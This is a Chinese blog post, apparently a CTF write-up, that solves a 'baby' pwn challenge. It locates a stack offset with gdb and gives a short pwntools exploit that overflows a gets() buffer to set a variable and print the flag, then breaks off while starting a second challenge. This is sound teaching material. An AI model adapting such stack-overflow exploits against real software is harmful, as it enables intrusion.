web选手入门pwn(12)

同时也是公司内部CTF的pwn wp。今年CTF其他题都不太难，没有什么好讲的，就讲讲pwn了。所有题都放在https://github.com/kezibei/pwn_study1.    baby可能是觉得放出的前两道堆题对于选手来说有点朝纲，于是另外放一道入门题给大家娱乐娱乐，甚至这题比ret2text可能更简单。跟进play()跟进printFlag()标准栈溢出gets，满足v1=100即用printFlag()读取/flag。这题做不出来感觉就基本告别pwn了。很显然，是让你用栈溢出修改v1的值。那么v1的值放在哪个地址呢？偏移量是多少呢？上gdb。gdb ./babyb playrn 5nAAAA刚好来到比较v1和0x64的大小，确定在rdp-4stack 50p/d 0x7fffffffe000-0x4-0x7fffffffdef0那么exp就很简单了#!/usr/bin/env pythonfrom pwn import *context.log_level = "debug"sh = process("./baby")sh.recvuntil("Your answer:")sh.sendline("\x00"*268+p64(0x64))print(sh.recvline())print(sh.recvline())2.    panote实战中这题没做出来，只做到 ………………………………